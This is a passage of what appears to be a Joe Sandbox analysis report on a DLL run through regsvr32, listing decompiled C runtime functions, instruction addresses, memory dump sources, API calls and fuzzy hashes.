                                                                      0x180056335
                                                                      0x18005633b
                                                                      0x180056340
                                                                      0x180056342
                                                                      0x180056349
                                                                      0x180056350
                                                                      0x180056357
                                                                      0x180056359
                                                                      0x18005635f
                                                                      0x180056369
                                                                      0x180056373
                                                                      0x18005637a
                                                                      0x18005637c
                                                                      0x180056381
                                                                      0x180056387
                                                                      0x18005638d
                                                                      0x180056395
                                                                      0x18005639a
                                                                      0x18005639f
                                                                      0x1800563a2
                                                                      0x1800563a5
                                                                      0x1800563a7
                                                                      0x1800563ac
                                                                      0x1800563b3
                                                                      0x1800563bb
                                                                      0x1800563ca
                                                                      0x1800563cf
                                                                      0x1800563e4

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: cae163e3ad4648034dab2fb3f2845362d679e330f1a379b843a53b724d906451
                                                                      • Instruction ID: 3ec733d4df0bd7a39123ceaa6f7b459ccfa252562ca80a214bff24c2d1ae3607
                                                                      • Opcode Fuzzy Hash: cae163e3ad4648034dab2fb3f2845362d679e330f1a379b843a53b724d906451
                                                                      • Instruction Fuzzy Hash: B181A232904E4C89F7B38B35A4503EA6661BB5D3D4F18C205BA5A376F5DF36C7898B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0000000118003066C(void* __ecx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, long long __r14) {
                                                                      				void* _v8;
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				char _v72;
                                                                      				void* _t31;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				void* _t40;
                                                                      				void* _t54;
                                                                      				char* _t65;
                                                                      				char* _t66;
                                                                      				char _t78;
                                                                      				long long* _t85;
                                                                      				void* _t92;
                                                                      
                                                                      				_t40 = __ecx;
                                                                      				_t54 = _t92;
                                                                      				 *((long long*)(_t54 + 8)) = __rbx;
                                                                      				 *((long long*)(_t54 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t54 + 0x18)) = __rdi;
                                                                      				 *((long long*)(_t54 + 0x20)) = __r14;
                                                                      				r14d = 0;
                                                                      				_t85 = __rcx;
                                                                      				_t65 =  *0x800738a8; // 0x0
                                                                      				sil = __edx;
                                                                      				if ( *_t65 != 0x51) goto 0x800306ab;
                                                                      				_t66 = _t65 + 1;
                                                                      				 *0x800738a8 = _t66;
                                                                      				_t78 =  *_t66;
                                                                      				if (__edx != 0) goto 0x800306c6;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                                      				 *__rcx = 0x8005fee0;
                                                                      				goto 0x80030799;
                                                                      				_t6 = _t78 - 0x30; // -48
                                                                      				if (_t6 - 9 > 0) goto 0x8003072a;
                                                                      				 *0x800738a8 = _t66 + 1;
                                                                      				if (1 == 0) goto 0x80030712;
                                                                      				_t7 = _t78 - 0x2f; // -47
                                                                      				E0000000118002E674(_t7,  &_v56, _t7, __r10);
                                                                      				E0000000118002E4E4( &_v40, 0x800721b8);
                                                                      				_t31 = E0000000118002E98C(0x8005fee0,  &_v72, 0x8005fee0);
                                                                      				goto 0x8003071f;
                                                                      				E0000000118002E674(_t31,  &_v24,  &_v72 - 0x2f, __r10);
                                                                      				 *_t85 = _v72;
                                                                      				goto 0x80030796;
                                                                      				_t34 = E00000001180030570(_t40,  &_v72,  &_v72 - 0x2f);
                                                                      				if (_v64 == r14b) goto 0x80030776;
                                                                      				 *0x800738a8 =  *0x800738a8 + 1;
                                                                      				if (sil == 0) goto 0x80030763;
                                                                      				if (1 == 0) goto 0x80030758;
                                                                      				_t35 = E0000000118002E6FC(_t34,  &_v24, _v72, __r11);
                                                                      				goto 0x800306ea;
                                                                      				_t36 = E0000000118002E6FC(_t35,  &_v56, _v72, __r11);
                                                                      				goto 0x8003071f;
                                                                      				if (1 == 0) goto 0x80030770;
                                                                      				goto 0x800306e5;
                                                                      				goto 0x8003071a;
                                                                      				_t59 =  !=  ? __r14 : 0x8005fee0;
                                                                      				 *_t85 =  !=  ? __r14 : 0x8005fee0;
                                                                      				asm("sbb eax, eax");
                                                                      				_t37 = _t36 & 0x00000002;
                                                                      				 *(_t85 + 8) = _t37;
                                                                      				return _t37;
                                                                      			}





















                                                                      0x18003066c
                                                                      0x18003066c
                                                                      0x18003066f
                                                                      0x180030673
                                                                      0x180030677
                                                                      0x18003067b
                                                                      0x180030687
                                                                      0x18003068a
                                                                      0x18003068d
                                                                      0x180030694
                                                                      0x18003069d
                                                                      0x18003069f
                                                                      0x1800306a4
                                                                      0x1800306ab
                                                                      0x1800306b1
                                                                      0x1800306ba
                                                                      0x1800306be
                                                                      0x1800306c1
                                                                      0x1800306c6
                                                                      0x1800306cb
                                                                      0x1800306d0
                                                                      0x1800306d9
                                                                      0x1800306db
                                                                      0x1800306e5
                                                                      0x1800306f8
                                                                      0x180030707
                                                                      0x180030710
                                                                      0x18003071a
                                                                      0x180030725
                                                                      0x180030728
                                                                      0x18003072e
                                                                      0x180030737
                                                                      0x180030739
                                                                      0x180030747
                                                                      0x18003074b
                                                                      0x180030751
                                                                      0x180030756
                                                                      0x18003075c
                                                                      0x180030761
                                                                      0x180030765
                                                                      0x18003076b
                                                                      0x180030774
                                                                      0x180030788
                                                                      0x18003078e
                                                                      0x180030791
                                                                      0x180030793
                                                                      0x180030796
                                                                      0x1800307b5

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: NameName::$Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 826178784-0
                                                                      • Opcode ID: 6fbe3cae168a5e0995915826b19a4262fd08b2c874cad42fd51f0d388e4191b5
                                                                      • Instruction ID: 7998ab1c132e5a542d38736b9200d94b27dc05cc7b9c287eb49698517abbd36b
                                                                      • Opcode Fuzzy Hash: 6fbe3cae168a5e0995915826b19a4262fd08b2c874cad42fd51f0d388e4191b5
                                                                      • Instruction Fuzzy Hash: 7841A832606A9898EB93CB60E8A13EE37A4F719BC0FA5C012FA4913795DF34D659C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00000001180046348(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                      				signed int _t27;
                                                                      				signed int _t28;
                                                                      				signed int _t29;
                                                                      				signed int _t30;
                                                                      				signed int _t31;
                                                                      				void* _t39;
                                                                      				signed int _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t45;
                                                                      				signed int _t47;
                                                                      				void* _t50;
                                                                      				void* _t53;
                                                                      
                                                                      				_t51 = __rbx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_t27 = __ecx & 0x0000001f;
                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x8004637a;
                                                                      				if (sil >= 0) goto 0x8004637a;
                                                                      				E00000001180056900(_t27, _t39, _t50, __rbx, _t53);
                                                                      				_t28 = _t27 & 0xfffffff7;
                                                                      				goto 0x800463d1;
                                                                      				_t43 = 0x00000004 & dil;
                                                                      				if (_t43 == 0) goto 0x80046395;
                                                                      				asm("dec eax");
                                                                      				if (_t43 >= 0) goto 0x80046395;
                                                                      				E00000001180056900(_t28, _t39, _t50, __rbx, _t53);
                                                                      				_t29 = _t28 & 0xfffffffb;
                                                                      				goto 0x800463d1;
                                                                      				_t44 = dil & 0x00000001;
                                                                      				if (_t44 == 0) goto 0x800463b1;
                                                                      				asm("dec eax");
                                                                      				if (_t44 >= 0) goto 0x800463b1;
                                                                      				E00000001180056900(_t29, _t39, _t50, _t51, _t53);
                                                                      				_t30 = _t29 & 0xfffffffe;
                                                                      				goto 0x800463d1;
                                                                      				_t45 = dil & 0x00000002;
                                                                      				if (_t45 == 0) goto 0x800463d1;
                                                                      				asm("dec eax");
                                                                      				if (_t45 >= 0) goto 0x800463d1;
                                                                      				if ((dil & 0x00000010) == 0) goto 0x800463ce;
                                                                      				E00000001180056900(_t30, _t39, _t50, _t51, _t53);
                                                                      				_t31 = _t30 & 0xfffffffd;
                                                                      				_t47 = dil & 0x00000010;
                                                                      				if (_t47 == 0) goto 0x800463eb;
                                                                      				asm("dec eax");
                                                                      				if (_t47 >= 0) goto 0x800463eb;
                                                                      				E00000001180056900(_t31, _t39, _t50, _t51, _t53);
                                                                      				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                      			}















                                                                      0x180046348
                                                                      0x180046348
                                                                      0x18004634d
                                                                      0x18004635c
                                                                      0x180046364
                                                                      0x180046369
                                                                      0x180046370
                                                                      0x180046375
                                                                      0x180046378
                                                                      0x18004637f
                                                                      0x180046382
                                                                      0x180046384
                                                                      0x180046389
                                                                      0x18004638b
                                                                      0x180046390
                                                                      0x180046393
                                                                      0x180046395
                                                                      0x180046399
                                                                      0x18004639b
                                                                      0x1800463a0
                                                                      0x1800463a7
                                                                      0x1800463ac
                                                                      0x1800463af
                                                                      0x1800463b1
                                                                      0x1800463b5
                                                                      0x1800463b7
                                                                      0x1800463bc
                                                                      0x1800463c2
                                                                      0x1800463c9
                                                                      0x1800463ce
                                                                      0x1800463d1
                                                                      0x1800463d5
                                                                      0x1800463d7
                                                                      0x1800463dc
                                                                      0x1800463e3
                                                                      0x180046401

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 5e1ea5958320e8ca47ef1d8c8def34004bffd7733a6e8ba4d05ded58e03174d6
                                                                      • Instruction ID: 7eed08ca824604a4e732dce7b500152b0538a810e40860c91f1e353ee3f68c8d
                                                                      • Opcode Fuzzy Hash: 5e1ea5958320e8ca47ef1d8c8def34004bffd7733a6e8ba4d05ded58e03174d6
                                                                      • Instruction Fuzzy Hash: 1911C632E54E9C06F6E61925E4D53E910406B5C3FDF07C624B966173FBEE648F89830A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000000018003AB77,?,?,00000000,000000018003AA4A,?,?,?,?,?,000000018003AD6A), ref: 0000000180038923
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003AB77,?,?,00000000,000000018003AA4A,?,?,?,?,?,000000018003AD6A), ref: 0000000180038942
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003AB77,?,?,00000000,000000018003AA4A,?,?,?,?,?,000000018003AD6A), ref: 000000018003896A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003AB77,?,?,00000000,000000018003AA4A,?,?,?,?,?,000000018003AD6A), ref: 000000018003897B
                                                                      • FlsSetValue.KERNEL32(?,?,?,000000018003AB77,?,?,00000000,000000018003AA4A,?,?,?,?,?,000000018003AD6A), ref: 000000018003898C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: a23dd452ffaf063218166c4d9b2549a2c7540260336e50c8dd0f0a3278a4b410
                                                                      • Instruction ID: 23e0b468f7b169ecd29738db32d726e239d4f91bdb7f388f669e40a51e2c6bad
                                                                      • Opcode Fuzzy Hash: a23dd452ffaf063218166c4d9b2549a2c7540260336e50c8dd0f0a3278a4b410
                                                                      • Instruction Fuzzy Hash: 24117C3070434802FADBA32559913FBA3815F9C3F0F4AC365B97A466D6DE2D87899712
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: f9ea3bbb147c05969661215b70551b8ef8b9f9d3b97646bec2cdb47bca64f447
                                                                      • Instruction ID: 19df7ce237e99d6198ed0bbd677cc1ba5e123c050d71f1f9d737972e08c36315
                                                                      • Opcode Fuzzy Hash: f9ea3bbb147c05969661215b70551b8ef8b9f9d3b97646bec2cdb47bca64f447
                                                                      • Instruction Fuzzy Hash: 8111913070530845FADFA37558913EB53815B9D3F0F4AC724B93A462D6DE2E878C4710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 6492b6c6c07b4cb66034516c07ea732b6ca2ad004a88efcc9eec2e9f5e5ea5f1
                                                                      • Instruction ID: 90d2a476753ed2afc6fba1ffdaacee17780f1a97b890b9fa81e817156e993aee
                                                                      • Opcode Fuzzy Hash: 6492b6c6c07b4cb66034516c07ea732b6ca2ad004a88efcc9eec2e9f5e5ea5f1
                                                                      • Instruction Fuzzy Hash: 6611153460420C41FAEBA33548523EB93825F5D3F0F6AC764B9364A6D2DE29978DA720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 12f59bfd31be67440eceb8b5e001d5d8b93eef8c750e4ef33836210693444c92
                                                                      • Instruction ID: b849ee662f3e5b5be8e196631d77ce4795a9e0d8e4f69b392a6aa071cc37e602
                                                                      • Opcode Fuzzy Hash: 12f59bfd31be67440eceb8b5e001d5d8b93eef8c750e4ef33836210693444c92
                                                                      • Instruction Fuzzy Hash: 8711093064030D49FADBA33158513EB53825F5D3F0F5ACB74B936852D2EE29878D6720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118005311C(void* __ecx, void* __edx, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                                                                      				void* __rdi;
                                                                      				void* __r14;
                                                                      				void* _t73;
                                                                      				intOrPtr _t78;
                                                                      				unsigned int _t105;
                                                                      				void* _t132;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr* _t141;
                                                                      				signed char* _t145;
                                                                      				void* _t146;
                                                                      				void* _t170;
                                                                      				signed char* _t171;
                                                                      				long long _t175;
                                                                      				void* _t176;
                                                                      				void* _t178;
                                                                      				void* _t179;
                                                                      				void* _t194;
                                                                      				void* _t195;
                                                                      				void* _t197;
                                                                      
                                                                      				_t132 = __rax;
                                                                      				 *((long long*)(_t178 + 8)) = __rbx;
                                                                      				 *((long long*)(_t178 + 0x10)) = _t175;
                                                                      				 *((long long*)(_t178 + 0x18)) = __rsi;
                                                                      				_t179 = _t178 - 0x80;
                                                                      				_t141 = __rcx;
                                                                      				_t176 = __r9;
                                                                      				_t195 = __rdx;
                                                                      				E0000000118002DB64(_t73, __r8);
                                                                      				E0000000118002DD20(_t132);
                                                                      				_t171 =  *((intOrPtr*)(_t179 + 0xc0));
                                                                      				r8d = 0x80000029;
                                                                      				r9d = 0x80000026;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x40)) != 0) goto 0x80053196;
                                                                      				if ( *__rcx == 0xe06d7363) goto 0x80053196;
                                                                      				if ( *__rcx != r8d) goto 0x80053188;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x8005318d;
                                                                      				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80053196;
                                                                      				if ( *__rcx == r9d) goto 0x80053196;
                                                                      				if (( *_t171 & 0x00000020) != 0) goto 0x80053388;
                                                                      				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x800532ba;
                                                                      				if (_t171[8] == 0) goto 0x80053388;
                                                                      				if ( *(_t171[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x180060660)) - 4) >>  *(__r8 + 0x180060670) == 0) goto 0x80053388;
                                                                      				if ( *((intOrPtr*)(_t179 + 0xc8)) != 0) goto 0x80053388;
                                                                      				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x800532a7;
                                                                      				if ( *__rcx != r9d) goto 0x8005325e;
                                                                      				_t145 = _t171;
                                                                      				_t78 = E000000011800517A4(__edx, __rcx, _t145, __r9, _t171, __rsi,  *((intOrPtr*)(__r9 + 0x20)), _t195, _t197, _t194);
                                                                      				r9d = _t78;
                                                                      				if (_t78 - 0xffffffff < 0) goto 0x800533aa;
                                                                      				if (_t171[8] == 0) goto 0x80053242;
                                                                      				_t105 =  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) - _t145[0x180060660] - 4) >> _t145[0x180060670];
                                                                      				if (r9d - _t105 >= 0) goto 0x800533aa;
                                                                      				_t146 = _t195;
                                                                      				E00000001180052564(__edx, r9d - _t105, _t146, _t176, _t171);
                                                                      				goto 0x80053388;
                                                                      				if ( *__rcx != r8d) goto 0x800532a7;
                                                                      				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                                      				if (r9d - 0xffffffff < 0) goto 0x800533aa;
                                                                      				if (r9d -  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) -  *((char*)(_t146 + 0x180060660)) - 4) >>  *(_t146 + 0x180060670) >= 0) goto 0x800533aa;
                                                                      				goto 0x8005324e;
                                                                      				E00000001180041FA8( *((char*)(_t146 + 0x180060660)), _t195, _t171);
                                                                      				goto 0x80053388;
                                                                      				E00000001180051C94(_t179 + 0x50, _t171,  *((intOrPtr*)(_t176 + 8)));
                                                                      				if ( *((intOrPtr*)(_t179 + 0x50)) != _t105) goto 0x800532da;
                                                                      				if (( *_t171 & 0x00000040) == 0) goto 0x80053388;
                                                                      				if ( *_t141 != 0xe06d7363) goto 0x8005334f;
                                                                      				if ( *((intOrPtr*)(_t141 + 0x18)) - 3 < 0) goto 0x8005334f;
                                                                      				if ( *((intOrPtr*)(_t141 + 0x20)) - 0x19930522 <= 0) goto 0x8005334f;
                                                                      				_t136 =  *((intOrPtr*)(_t141 + 0x30));
                                                                      				if ( *((intOrPtr*)(_t136 + 8)) == _t105) goto 0x8005334f;
                                                                      				E000000011800422B4(_t136);
                                                                      				if (_t136 +  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) + 8)) == 0) goto 0x8005334f;
                                                                      				 *(_t179 + 0x38) =  *(_t179 + 0xd8) & 0x000000ff;
                                                                      				 *((long long*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xd0));
                                                                      				 *((intOrPtr*)(_t179 + 0x28)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                                      				 *(_t179 + 0x20) = _t171;
                                                                      				 *0x8007a008(_t170);
                                                                      				goto 0x8005338d;
                                                                      				 *(_t179 + 0x38) =  *((intOrPtr*)(_t179 + 0xd0));
                                                                      				 *((intOrPtr*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                                      				 *((char*)(_t179 + 0x28)) =  *(_t179 + 0xd8);
                                                                      				 *(_t179 + 0x20) = _t171;
                                                                      				E00000001180054098(__edx, _t105, _t136 +  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) + 8)), _t141, _t195, 0x180000000, _t176);
                                                                      				return 1;
                                                                      			}






















                                                                      0x18005311c
                                                                      0x18005311c
                                                                      0x180053121
                                                                      0x180053126
                                                                      0x180053130
                                                                      0x180053137
                                                                      0x18005313a
                                                                      0x180053143
                                                                      0x180053146
                                                                      0x18005314b
                                                                      0x180053150
                                                                      0x18005315a
                                                                      0x180053160
                                                                      0x180053169
                                                                      0x180053171
                                                                      0x180053176
                                                                      0x18005317c
                                                                      0x180053186
                                                                      0x18005318b
                                                                      0x180053190
                                                                      0x18005319a
                                                                      0x1800531a3
                                                                      0x1800531d9
                                                                      0x1800531e6
                                                                      0x1800531f0
                                                                      0x1800531f9
                                                                      0x180053202
                                                                      0x180053205
                                                                      0x18005320a
                                                                      0x180053210
                                                                      0x180053219
                                                                      0x180053240
                                                                      0x180053245
                                                                      0x18005324b
                                                                      0x180053254
                                                                      0x180053259
                                                                      0x180053261
                                                                      0x180053263
                                                                      0x18005326b
                                                                      0x18005329b
                                                                      0x1800532a5
                                                                      0x1800532b0
                                                                      0x1800532b5
                                                                      0x1800532c6
                                                                      0x1800532cf
                                                                      0x1800532d4
                                                                      0x1800532e0
                                                                      0x1800532e6
                                                                      0x1800532ef
                                                                      0x1800532f1
                                                                      0x1800532f8
                                                                      0x1800532fa
                                                                      0x18005330d
                                                                      0x18005331a
                                                                      0x18005332c
                                                                      0x18005333b
                                                                      0x180053342
                                                                      0x180053347
                                                                      0x18005334d
                                                                      0x18005335a
                                                                      0x18005336c
                                                                      0x18005337a
                                                                      0x18005337e
                                                                      0x180053383
                                                                      0x1800533a9

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __except_validate_context_record
                                                                      • String ID: MZx$csm$csm
                                                                      • API String ID: 1467352782-1981104119
                                                                      • Opcode ID: 595b91c370fb46815d78e0d8b3502694343c3555ebde0bcfd9cab9bd64a0c10a
                                                                      • Instruction ID: 4f6b709ce4cd247431f26e87af1b176ea73c5f667fb9bc5aa8936474eb7af182
                                                                      • Opcode Fuzzy Hash: 595b91c370fb46815d78e0d8b3502694343c3555ebde0bcfd9cab9bd64a0c10a
                                                                      • Instruction Fuzzy Hash: A871D332204A8886DBA68F25D4957EDBBA1F349FC9F14C115FE8867B89CF39C659C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00000001180054668(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                      				void* _t19;
                                                                      				void* _t27;
                                                                      				void* _t36;
                                                                      				void* _t39;
                                                                      				void* _t42;
                                                                      				void* _t43;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				void* _t52;
                                                                      				void* _t54;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      
                                                                      				_t27 = _t45;
                                                                      				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                      				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                      				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                      				_t43 = _t27 - 0x3f;
